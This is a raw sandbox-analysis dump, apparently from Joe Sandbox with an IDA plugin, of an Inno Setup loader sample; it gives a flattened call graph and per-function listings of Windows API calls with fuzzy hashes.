5899 403198 4 API calls 
5898->5899 5900 409311 5899->5900 5900->5698 5902 405198 19 API calls 5901->5902 5903 404ca2 5902->5903 5903->5698 5905 408dc8 5904->5905 6004 408c80 5905->6004 5909 4034f0 4 API calls 5908->5909 5911 406a6b 5909->5911 5910 406a82 GetEnvironmentVariableA 5910->5911 5912 406a8e 5910->5912 5911->5910 5915 406a95 5911->5915 5930 406dec 5911->5930 5913 403198 4 API calls 5912->5913 5913->5915 5915->5862 5925 406a34 5915->5925 5917 403414 5916->5917 5918 4068ab GetFullPathNameA 5917->5918 5919 4068b7 5918->5919 5920 4068ce 5918->5920 5919->5920 5921 4068bf 5919->5921 5922 40322c 4 API calls 5920->5922 5923 403278 4 API calls 5921->5923 5924 4068cc 5922->5924 5923->5924 5924->5873 5934 4069dc 5925->5934 5929 406ce9 5928->5929 5929->5866 5931 406dfa 5930->5931 5932 4034f0 4 API calls 5931->5932 5933 406e08 5932->5933 5933->5911 5941 406978 5934->5941 5936 4069fe 5937 406a06 GetFileAttributesA 5936->5937 5938 406a1b 5937->5938 5939 403198 4 API calls 5938->5939 5940 406a23 5939->5940 5940->5862 5951 406744 5941->5951 5943 4069b0 5946 4069c6 5943->5946 5947 4069bb 5943->5947 5945 406989 5945->5943 5958 406970 CharPrevA 5945->5958 5959 403454 5946->5959 5948 40322c 4 API calls 5947->5948 5950 4069c4 5948->5950 5950->5936 5954 406755 5951->5954 5952 4067b9 5953 406680 IsDBCSLeadByte 5952->5953 5955 4067b4 5952->5955 5953->5955 5954->5952 5956 406773 5954->5956 5955->5945 5956->5955 5966 406680 IsDBCSLeadByte 5956->5966 5958->5945 5960 403486 5959->5960 5961 403459 5959->5961 5962 403198 4 API calls 5960->5962 5961->5960 5964 40346d 5961->5964 5963 40347c 5962->5963 5963->5950 5965 403278 4 API calls 5964->5965 5965->5963 5967 406694 5966->5967 5967->5956 5969 403198 4 API calls 5968->5969 5971 4091d1 5969->5971 5973 4091fe 5971->5973 5985 4032a8 5971->5985 5988 403494 5971->5988 5974 403198 4 API calls 5973->5974 5975 409213 5974->5975 5975->5893 5992 408f70 5976->5992 5978 40904a 5979 40904e 5978->5979 5998 406a48 5978->5998 5979->5893 5982 409081 6001 408fac 5982->6001 5986 
403278 4 API calls 5985->5986 5987 4032b5 5986->5987 5987->5971 5989 403498 5988->5989 5991 4034c3 5988->5991 5990 4034f0 4 API calls 5989->5990 5990->5991 5991->5971 5993 408f7a 5992->5993 5994 408f7e 5992->5994 5993->5978 5995 408fa0 SetLastError 5994->5995 5996 408f87 Wow64DisableWow64FsRedirection 5994->5996 5997 408f9b 5995->5997 5996->5997 5997->5978 5999 4069dc 7 API calls 5998->5999 6000 406a52 GetLastError 5999->6000 6000->5982 6002 408fb1 Wow64RevertWow64FsRedirection 6001->6002 6003 408fbb 6001->6003 6002->6003 6003->5893 6005 403198 4 API calls 6004->6005 6011 408cb1 6004->6011 6005->6011 6006 408cdc 6007 4031b8 4 API calls 6006->6007 6009 408d69 6007->6009 6008 408cc8 6012 4032fc 4 API calls 6008->6012 6009->5698 6010 403278 4 API calls 6010->6011 6011->6006 6011->6008 6011->6010 6013 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6011->6013 6012->6006 6013->6011 6015 406744 IsDBCSLeadByte 6014->6015 6017 406835 6015->6017 6016 40687f 6016->5716 6017->6016 6018 406680 IsDBCSLeadByte 6017->6018 6018->6017 6020 4068f3 6019->6020 6021 406820 IsDBCSLeadByte 6020->6021 6023 4068fe 6021->6023 6022 4066ea 6022->5721 6022->5722 6023->6022 6024 406680 IsDBCSLeadByte 6023->6024 6024->6023 6026 406957 6025->6026 6027 40695b 6025->6027 6026->5736 6030 406970 CharPrevA 6027->6030 6029 40696c 6029->5736 6030->6029 6032 402bd5 RaiseException 6031->6032 6033 402be6 6031->6033 6032->6033 6033->5759 6286 402e64 6287 402e69 6286->6287 6288 402e7a RtlUnwind 6287->6288 6289 402e5e 6287->6289 6290 402e9d 6288->6290 6307 40667c IsDBCSLeadByte 6308 406694 6307->6308 6720 403f7d 6721 403fa2 6720->6721 6724 403f84 6720->6724 6723 403e8e 4 API calls 6721->6723 6721->6724 6722 403f8c 6723->6724 6724->6722 6725 402674 4 API calls 6724->6725 6726 403fca 6725->6726 6733 403d02 6739 403d12 6733->6739 6734 403ddf ExitProcess 6735 403db8 6737 403cc8 4 API calls 6735->6737 6736 403dea 6738 403dc2 6737->6738 6740 403cc8 4 API calls 6738->6740 6739->6734 6739->6735 6739->6736 
6739->6739 6742 403da4 6739->6742 6743 403d8f MessageBoxA 6739->6743 6741 403dcc 6740->6741 6753 4019dc 6741->6753 6749 403fe4 6742->6749 6743->6735 6746 403dd1 6746->6734 6746->6736 6750 403fe8 6749->6750 6751 403f07 4 API calls 6750->6751 6752 404006 6751->6752 6754 401abb 6753->6754 6755 4019ed 6753->6755 6754->6746 6756 401a04 RtlEnterCriticalSection 6755->6756 6757 401a0e LocalFree 6755->6757 6756->6757 6758 401a41 6757->6758 6759 401a2f VirtualFree 6758->6759 6760 401a49 6758->6760 6759->6758 6761 401a70 LocalFree 6760->6761 6762 401a87 6760->6762 6761->6761 6761->6762 6763 401aa9 RtlDeleteCriticalSection 6762->6763 6764 401a9f RtlLeaveCriticalSection 6762->6764 6763->6746 6764->6763 6317 404206 6318 4041cc 6317->6318 6321 40420a 6317->6321 6319 404282 6320 403154 4 API calls 6322 404323 6320->6322 6321->6319 6321->6320 6323 402c08 6326 402c82 6323->6326 6327 402c19 6323->6327 6324 402c56 RtlUnwind 6325 403154 4 API calls 6324->6325 6325->6326 6327->6324 6327->6326 6330 402b28 6327->6330 6331 402b31 RaiseException 6330->6331 6332 402b47 6330->6332 6331->6332 6332->6324 6333 408c10 6334 408c17 6333->6334 6335 403198 4 API calls 6334->6335 6343 408cb1 6335->6343 6336 408cdc 6337 4031b8 4 API calls 6336->6337 6339 408d69 6337->6339 6338 408cc8 6341 4032fc 4 API calls 6338->6341 6340 403278 4 API calls 6340->6343 6341->6336 6342 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6342->6343 6343->6336 6343->6338 6343->6340 6343->6342 6344 40a011 6345 40a036 6344->6345 6346 407918 InterlockedExchange 6345->6346 6348 40a060 6346->6348 6347 40a070 6354 4076ac SetEndOfFile 6347->6354 6348->6347 6349 409aa0 4 API calls 6348->6349 6349->6347 6351 40a08c 6352 4025ac 4 API calls 6351->6352 6353 40a0c3 6352->6353 6355 4076c3 6354->6355 6356 4076bc 6354->6356 6355->6351 6357 40748c 21 API calls 6356->6357 6357->6355 6769 409916 6770 409918 6769->6770 6771 40993a 6770->6771 6772 409956 CallWindowProcA 6770->6772 6772->6771 6085 407017 6086 407008 SetErrorMode 6085->6086 
6362 403018 6363 403070 6362->6363 6364 403025 6362->6364 6365 40302a RtlUnwind 6364->6365 6366 40304e 6365->6366 6368 402f78 6366->6368 6369 402be8 6366->6369 6370 402bf1 RaiseException 6369->6370 6371 402c04 6369->6371 6370->6371 6371->6363 6779 409918 6780 40993a 6779->6780 6782 409927 6779->6782 6781 409956 CallWindowProcA 6781->6780 6782->6780 6782->6781 6376 40901e 6377 409010 6376->6377 6378 408fac Wow64RevertWow64FsRedirection 6377->6378 6379 409018 6378->6379 6380 409020 SetLastError 6381 409029 6380->6381 6392 403a28 ReadFile 6393 403a46 6392->6393 6394 403a49 GetLastError 6392->6394 6223 40762c ReadFile 6224 407663 6223->6224 6225 40764c 6223->6225 6226 407652 GetLastError 6225->6226 6227 40765c 6225->6227 6226->6224 6226->6227 6228 40748c 21 API calls 6227->6228 6228->6224 6399 40a02c 6400 409aa0 4 API calls 6399->6400 6401 40a031 6400->6401 6402 40a036 6401->6402 6403 402f24 5 API calls 6401->6403 6404 407918 InterlockedExchange 6402->6404 6403->6402 6405 40a060 6404->6405 6406 40a070 6405->6406 6407 409aa0 4 API calls 6405->6407 6408 4076ac 22 API calls 6406->6408 6407->6406 6409 40a08c 6408->6409 6410 4025ac 4 API calls 6409->6410 6411 40a0c3 6410->6411 6783 40712e 6784 407118 6783->6784 6785 403198 4 API calls 6784->6785 6786 407120 6785->6786 6787 403198 4 API calls 6786->6787 6788 407128 6787->6788 6789 408f30 6792 408dfc 6789->6792 6793 408e05 6792->6793 6794 403198 4 API calls 6793->6794 6795 408e13 6793->6795 6794->6793 6796 403932 6797 403924 6796->6797 6800 40374c 6797->6800 6799 40392c 6801 403766 6800->6801 6802 403759 6800->6802 6801->6799 6802->6801 6803 403779 VariantClear 6802->6803 6803->6799 6034 4075c4 SetFilePointer 6035 4075f7 6034->6035 6036 4075e7 GetLastError 6034->6036 6036->6035 6037 4075f0 6036->6037 6038 40748c 21 API calls 6037->6038 6038->6035 6412 405ac4 6413 405ad4 6412->6413 6414 405acc 6412->6414 6415 405ad2 6414->6415 6416 405adb 6414->6416 6419 405a3c 6415->6419 6417 405930 5 API calls 6416->6417 6417->6413 6420 
405a44 6419->6420 6421 405a5e 6420->6421 6422 403154 4 API calls 6420->6422 6423 405a63 6421->6423 6424 405a7a 6421->6424 6422->6420 6425 405930 5 API calls 6423->6425 6426 403154 4 API calls 6424->6426 6427 405a76 6425->6427 6428 405a7f 6426->6428 6430 403154 4 API calls 6427->6430 6429 4059a0 19 API calls 6428->6429 6429->6427 6431 405aa8 6430->6431 6432 403154 4 API calls 6431->6432 6433 405ab6 6432->6433 6433->6413 6434 4076c8 WriteFile 6435 4076e8 6434->6435 6438 4076ef 6434->6438 6436 40748c 21 API calls 6435->6436 6436->6438 6437 407700 6438->6437 6439 4073ec 20 API calls 6438->6439 6439->6437 6440 40a2ca 6449 4096fc 6440->6449 6443 402f24 5 API calls 6444 40a2d4 6443->6444 6445 403198 4 API calls 6444->6445 6446 40a2f3 6445->6446 6447 403198 4 API calls 6446->6447 6448 40a2fb 6447->6448 6458 40569c 6449->6458 6451 409745 6454 403198 4 API calls 6451->6454 6452 409717 6452->6451 6464 40720c 6452->6464 6456 40975a 6454->6456 6455 409735 6457 40973d MessageBoxA 6455->6457 6456->6443 6457->6451 6459 403154 4 API calls 6458->6459 6460 4056a1 6459->6460 6461 4056b9 6460->6461 6462 403154 4 API calls 6460->6462 6461->6452 6463 4056af 6462->6463 6463->6452 6465 40569c 4 API calls 6464->6465 6466 40721b 6465->6466 6467 407221 6466->6467 6470 40722f 6466->6470 6468 40322c 4 API calls 6467->6468 6469 40722d 6468->6469 6469->6455 6471 40724b 6470->6471 6472 40723f 6470->6472 6482 4032b8 6471->6482 6475 4071d0 6472->6475 6476 40322c 4 API calls 6475->6476 6477 4071df 6476->6477 6478 4071fc 6477->6478 6479 406950 CharPrevA 6477->6479 6478->6469 6480 4071eb 6479->6480 6480->6478 6481 4032fc 4 API calls 6480->6481 6481->6478 6483 403278 4 API calls 6482->6483 6484 4032c2 6483->6484 6484->6469 6485 402ccc 6486 402cdd 6485->6486 6490 402cfe 6485->6490 6487 402d88 RtlUnwind 6486->6487 6489 402b28 RaiseException 6486->6489 6486->6490 6488 403154 4 API calls 6487->6488 6488->6490 6491 402d7f 6489->6491 6491->6487 6812 403fcd 6813 403f07 4 API calls 6812->6813 6814 403fd6 
6813->6814 6815 403e9c 4 API calls 6814->6815 6816 403fe2 6815->6816 5470 4024d0 5471 4024e4 5470->5471 5472 4024f7 5470->5472 5509 401918 RtlInitializeCriticalSection 5471->5509 5474 402518 5472->5474 5475 40250e RtlEnterCriticalSection 5472->5475 5486 402300 5474->5486 5475->5474 5478 4024ed 5480 402525 5483 402581 5480->5483 5484 402577 RtlLeaveCriticalSection 5480->5484 5482 402531 5482->5480 5516 40215c 5482->5516 5484->5483 5487 402314 5486->5487 5488 402335 5487->5488 5494 4023b8 5487->5494 5489 402344 5488->5489 5530 401b74 5488->5530 5489->5480 5496 401fd4 5489->5496 5493 402455 5493->5489 5537 401d00 5493->5537 5494->5489 5494->5493 5533 401d80 5494->5533 5541 401e84 5494->5541 5497 401fe8 5496->5497 5498 401ffb 5496->5498 5499 401918 4 API calls 5497->5499 5500 402012 RtlEnterCriticalSection 5498->5500 5503 40201c 5498->5503 5501 401fed 5499->5501 5500->5503 5501->5498 5502 401ff1 5501->5502 5506 402052 5502->5506 5503->5506 5623 401ee0 5503->5623 5506->5482 5507 402147 5507->5482 5508 40213d RtlLeaveCriticalSection 5508->5507 5510 40193c RtlEnterCriticalSection 5509->5510 5511 401946 5509->5511 5510->5511 5512 401964 LocalAlloc 5511->5512 5513 40197e 5512->5513 5514 4019c3 RtlLeaveCriticalSection 5513->5514 5515 4019cd 5513->5515 5514->5515 5515->5472 5515->5478 5517 40217a 5516->5517 5518 402175 5516->5518 5520 4021ab RtlEnterCriticalSection 5517->5520 5523 4021b5 5517->5523 5524 40217e 5517->5524 5519 401918 4 API calls 5518->5519 5519->5517 5520->5523 5521 4021c1 5525 4022e3 RtlLeaveCriticalSection 5521->5525 5526 4022ed 5521->5526 5522 402244 5522->5524 5527 401d80 7 API calls 5522->5527 5523->5521 5523->5522 5528 402270 5523->5528 5524->5480 5525->5526 5526->5480 5527->5524 5528->5521 5529 401d00 7 API calls 5528->5529 5529->5521 5531 40215c 9 API calls 5530->5531 5532 401b95 5531->5532 5532->5489 5534 401d92 5533->5534 5535 401d89 5533->5535 5534->5494 5535->5534 5536 401b74 9 API calls 5535->5536 5536->5534 5538 401d4e 5537->5538 5539 401d1e 
5537->5539 5538->5539 5546 401c68 5538->5546 5539->5489 5601 401768 5541->5601 5543 401e99 5545 401ea6 5543->5545 5612 401dcc 5543->5612 5545->5494 5547 401c7a 5546->5547 5548 401c9d 5547->5548 5549 401caf 5547->5549 5559 40188c 5548->5559 5550 40188c 3 API calls 5549->5550 5552 401cad 5550->5552 5553 401cc5 5552->5553 5569 401b44 5552->5569 5553->5539 5555 401cd4 5556 401cee 5555->5556 5574 401b98 5555->5574 5579 4013a0 5556->5579 5560 4018b2 5559->5560 5568 40190b 5559->5568 5583 401658 5560->5583 5565 4018e6 5567 4013a0 LocalAlloc 5565->5567 5565->5568 5567->5568 5568->5552 5570 401b61 5569->5570 5571 401b52 5569->5571 5570->5555 5572 401d00 9 API calls 5571->5572 5573 401b5f 5572->5573 5573->5555 5575 401bab 5574->5575 5576 401b9d 5574->5576 5575->5556 5577 401b74 9 API calls 5576->5577 5578 401baa 5577->5578 5578->5556 5580 4013ab 5579->5580 5581 4013c6 5580->5581 5582 4012e4 LocalAlloc 5580->5582 5581->5553 5582->5581 5584 40168f 5583->5584 5585 4016cf 5584->5585 5586 4016a9 VirtualFree 5584->5586 5587 40132c 5585->5587 5586->5584 5588 401348 5587->5588 5595 4012e4 5588->5595 5591 40150c 5594 40153b 5591->5594 5592 401594 5592->5565 5593 401568 VirtualFree 5593->5594 5594->5592 5594->5593 5598 40128c 5595->5598 5599 401298 LocalAlloc 5598->5599 5600 4012aa 5598->5600 5599->5600 5600->5565 5600->5591 5602 401787 5601->5602 5603 40183b 5602->5603 5604 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5602->5604 5606 40132c LocalAlloc 5602->5606 5607 401821 5602->5607 5609 4017d6 5602->5609 5611 4017e7 5603->5611 5619 4015c4 5603->5619 5604->5602 5606->5602 5608 40150c VirtualFree 5607->5608 5608->5611 5610 40150c VirtualFree 5609->5610 5610->5611 5611->5543 5613 401d80 9 API calls 5612->5613 5614 401de0 5613->5614 5615 40132c LocalAlloc 5614->5615 5617 401df0 5615->5617 5616 401df8 5616->5545 5617->5616 5618 401b44 9 API calls 5617->5618 5618->5616 5620 40160a 5619->5620 5621 401626 VirtualAlloc 5620->5621 5622 40163a 5620->5622 5621->5620 5621->5622 
5622->5611 5626 401ef0 5623->5626 5624 401f1c 5625 401d00 9 API calls 5624->5625 5628 401f40 5624->5628 5625->5628 5626->5624 5626->5628 5629 401e58 5626->5629 5628->5507 5628->5508 5634 4016d8 5629->5634 5632 401e75 5632->5626 5633 401dcc 9 API calls 5633->5632 5638 4016f4 5634->5638 5635 4016fe 5637 4015c4 VirtualAlloc 5635->5637 5641 40170a 5637->5641 5638->5635 5639 40175b 5638->5639 5640 40132c LocalAlloc 5638->5640 5642 40174f 5638->5642 5644 401430 5638->5644 5639->5632 5639->5633 5640->5638 5641->5639 5643 40150c VirtualFree 5642->5643 5643->5639 5645 40143f VirtualAlloc 5644->5645 5647 40146c 5645->5647 5648 40148f 5645->5648 5649 4012e4 LocalAlloc 5647->5649 5648->5638 5650 401478 5649->5650 5650->5648 5651 40147c VirtualFree 5650->5651 5651->5648 6492 4028d2 6493 4028da 6492->6493 6494 403554 4 API calls 6493->6494 6495 4028ef 6493->6495 6494->6493 6496 4025ac 4 API calls 6495->6496 6497 4028f4 6496->6497 6817 4019d3 6818 4019ba 6817->6818 6819 4019c3 RtlLeaveCriticalSection 6818->6819 6820 4019cd 6818->6820 6819->6820 6039 407fd4 6040 407fe6 6039->6040 6042 407fed 6039->6042 6050 407f10 6040->6050 6043 408021 6042->6043 6044 408015 6042->6044 6045 408017 6042->6045 6046 40804e 6043->6046 6048 407d7c 19 API calls 6043->6048 6064 407e2c 6044->6064 6061 407d7c 6045->6061 6048->6046 6051 407f25 6050->6051 6052 407d7c 19 API calls 6051->6052 6053 407f34 6051->6053 6052->6053 6054 407f6e 6053->6054 6055 407d7c 19 API calls 6053->6055 6056 407f82 6054->6056 6057 407d7c 19 API calls 6054->6057 6055->6054 6060 407fae 6056->6060 6071 407eb8 6056->6071 6057->6056 6060->6042 6074 4058b4 6061->6074 6063 407d9e 6063->6043 6065 405184 19 API calls 6064->6065 6066 407e57 6065->6066 6082 407de4 6066->6082 6068 407e5f 6069 403198 4 API calls 6068->6069 6070 407e74 6069->6070 6070->6043 6072 407ec7 VirtualFree 6071->6072 6073 407ed9 VirtualAlloc 6071->6073 6072->6073 6073->6060 6075 4058c0 6074->6075 6076 405184 19 API calls 6075->6076 6077 4058ed 6076->6077 6078 4031e8 4 

Control-flow Graph
APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B42
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Virtual$ProtectQuery$InfoSystem
• String ID:
• API String ID: 2441996862-0
• Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
• Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
• Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
• Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
• Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
• Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
• Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
• Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
• Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
• Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
• Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

Control-flow Graph

APIs
• SetLastError.KERNEL32 ref: 0040A0F4
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C50), ref: 0040966C
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
• SetWindowLongA.USER32(00010480,000000FC,00409918), ref: 0040A148
• RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
• 73A15CF0.USER32(00010480,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: ErrorLastWindow$CreateDirectoryLongRemove
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 3341979996-3001827809
• Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
• Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
• Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
• Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
• Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
• Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
• Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

Control-flow Graph

APIs
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
• SetWindowLongA.USER32(00010480,000000FC,00409918), ref: 0040A148
  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
  • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000,00409A77), ref: 00409A14
  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000), ref: 00409A28
  • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
  • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90), ref: 00409A5C
• RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
• 73A15CF0.USER32(00010480,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 978128352-3001827809
• Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
• Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
• Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
• Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

Control-flow Graph

APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000,00409A77), ref: 00409A14
• CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000), ref: 00409A28
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
• GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
• CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90), ref: 00409A5C
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C50), ref: 0040966C
Strings
Memory Dump Source
• Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
